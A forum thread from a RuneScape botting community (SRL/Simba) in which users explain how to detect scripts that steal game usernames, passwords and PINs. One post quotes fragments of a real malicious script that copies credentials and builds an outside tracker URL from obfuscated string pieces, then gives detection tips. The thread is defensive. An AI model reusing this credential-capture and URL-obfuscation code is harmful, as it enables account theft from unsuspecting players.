Hello!
I am curious about how we can check for scripts which will steal data and sends it back to the creator.
Can anyone advise please?
Thanks![]()
Hello!
I am curious about how we can check for scripts which will steal data and sends it back to the creator.
Can anyone advise please?
Thanks![]()
it isn't a straightforward thing to answer. i looked into one of the scripts that used to be here and got removed and poster banned - someone asked about it earlier and this is what i saw:
first of all any time you have any kind of operation within the script that has username or password or pin on the RIGHT HAND of the assignment, that's not good
an example from actual code that i looked at (also note statements that clearly are for lack of a better term - utterly stupid nonsense - such as testing if 1+3 is larger than 0... that's just wrong, or assigning variable its own value)
Simba Code:Function LV:Boolean;
begin
If(1+3>0)then <<< WHAT????
begin
C:=C; <<< WHAT????
I:=I; <<< WHAT????
Z:=Z; <<< WHAT????
I:=Players[CurrentPlayer].Name; <<< AHA! that is where my login goes
G:= Players[CurrentPlayer].Pin;
Z:=Players[CurrentPlayer].Pass;
Result:=True;
end;
end;
also look for cryptic stuff that does not need to be cryptic (i.e. why spend so much time writing so many short string variables to make one url? because you are throwing in my username and password and pin, duh!):
Simba Code:Function K:Boolean;
Var
PZ,AZ,AX,TY,LM,BS,RJ,RF,DB,AJ,RN,TP,GY,PS,LJ,LD,DF,DT,YT,DS,DV,MM,BP,NP,FP,SW,QA,SX,RA,US,OZ,OP,LB:String;
begin
PZ:= I; <<<<< HEY is this my player username??????
LM:= Z; <<<< HEY this looks an awfully much like the variable with my password
FFS:='Au'; FPS:='th'; LLM:='en'; RBJ:='ti';RJK:='ca';KKK:='ted.'; //Authenticated..
//Decoder characters..
LD:='fx';BS:= 'tu';RF:='re'; DB:='cr';OP:='i';OZ:='I';RN:= 'te';TP:= 'r.';
GY:= 'zx';AZ:= ':/';PS:= 'q';DF:='e';US:='s'; TY:= 'ht'; DV:='da';DT:='t';YT:='/';
DS:='up';LJ:='.n'; AJ:= 'af';MM:='te';BP:='r.';RJ:= 'na'SW:='ph';AX:= 'tp';QA:='?v';
SX:='er'; RA:='p';NP:='&';FP:='q=';
Q:=NP; //&
L:=FP; //q=
TR:=TY+AX+AZ+YT+RJ+BS+RF+DB+AJ+RN+TP+GY+PS+LJ+DF+DT+'/tracker.'+SW+RA; //TR:= [url]HTTP://naturecrafter.zxq.net/tracker.php[/url]
so my suggestions are:
- if the script is hard to read - run away from it
- always have simba firewall on and do not just accept exception without making sure that it uses website that you trust
- check the code for anything anomalous or nonsensical*
- search for the pin and password and username variables and make sure they are not assigned to something else
- if the script uses ini file to store values, make sure that the values it reads are not similarly misused
* loops like "while true do mainloop;" are however valid, they just say "keep looping until forever".
Perfect script? There is no such thing as "perfect", only "better than you expect".
zmon basically hit the nail on the head. A quick way to check is to find where "Username", "Password", and "Pin" show up. If they appear anywhere out of the DeclarePlayers, InPin, or any other pre built method from the SRL include, I would investigate it to see what it's doing.
However, there's ~1% you'll download a malicious script from here. We keep on top of that pretty well. Also, enable security.sex, it will show you all connections being made from a script.
Away for awhile, life is keeping me busy. | Want to get my attention in a thread? @Kyle Undefined; me.
{ MSI Phoenix || SRL Stats Sigs || Paste || Scripts || Quotes || Graphics }
When posting a bug, please post debug! Help us, help you!
I would love to change the world, but they won't give me the source code. || To be the best, you've got to beat the rest. || Logic never changes, just the syntax.
If you PM me with a stupid question or one listed in FAQ, or about a script that is not mine, I will NOT respond.
SRL is a Library of routines made by the SRL community written for the Program Simba. We produce Scripts for the game Runescape.
Normally you can ctrl f for .name and if it's anywhere in the script besides the top/progress report then it might be risky.
You cab enable the security.sex extension and it will tell you every time the script tries to acess the Internet. If it's trying to talk to anything besides SRL stats (and MAYBE the scripts auto update page IF it had one(not many do)) then be worried.
Honestly in all of SRl/SCARs history there have been very few malicious scripts, not much to worry about!
You have to have some knowledge in order to find certain lines of code which may send your username and password somewhere.
The easiest way I can think of to prevent this is to do the following
1. Open Simba
2. Click "view" and then click "extentions"
3. Enable security.sex
Whenever Simba tries to make a connection somewhere it will prompt you and ask you if you would like to allow the connection. If you see an unusual connection to some random website decline it.
This is very true. I have been here since 2008 and I have only ever seen one or two instances of someone creating a script to steal usernames and passwords.
Last edited by cycrosism; 05-26-2012 at 07:51 AM.
Click here to find out how to get full screen without members! | Click here to check out my Ultimate Bitmap Tutorial! Edited to work with Simba! |
Thanks so much for the clarification guys!
Generally, if the script communicates with a webpage its malicious. I never get scripts off site, but when checking some I found around, I deleted all the links in the script.
Miner & Urn Crafter & 07 Chicken Killer
SPS BlindWalk Tutorial
Working on: Nothing
teacher in every art, brought the fire that hath proved to mortals a means to mighty ends
Wow, I didn't realize how well URLs could be disguised.
Thanks for the info, guys!
There's also another way that's a bit harder to recognize..
[Content removed]
This kind of malicious script is actually pretty well hidden and a simple control F does nothing.
EDITED: Post was too detailed.. Like Yohojo said below.. the ideas mentioned are too dangerous..
Last edited by Brandon; 05-27-2012 at 07:31 AM.
I am Ggzz..
Hackintosher
Click here to find out how to get full screen without members! | Click here to check out my Ultimate Bitmap Tutorial! Edited to work with Simba! |
I made a script that when it was run (Before it opened SMART and all of that), would connect to my website and grab the latest "news" that I had put up and would also check to make sure the script was up to date.
It never sent any data to my website. Only read data using the GetPage function.
It would grab this link here
http://cycrosism.webs.com/news.txt
Then it would read all of the data from it and print it out in the debug box. That was all it did. I also made a version checker but I cannot seem to find it anywhere.
Here is a sample of how I did this.
Simba Code:program new;
begin
Cleardebug;
Writeln(Getpage('http://cycrosism.webs.com/news.txt'));
end.
Last edited by cycrosism; 05-27-2012 at 09:12 AM.
Click here to find out how to get full screen without members! | Click here to check out my Ultimate Bitmap Tutorial! Edited to work with Simba! |
There are currently 1 users browsing this thread. (0 members and 1 guests)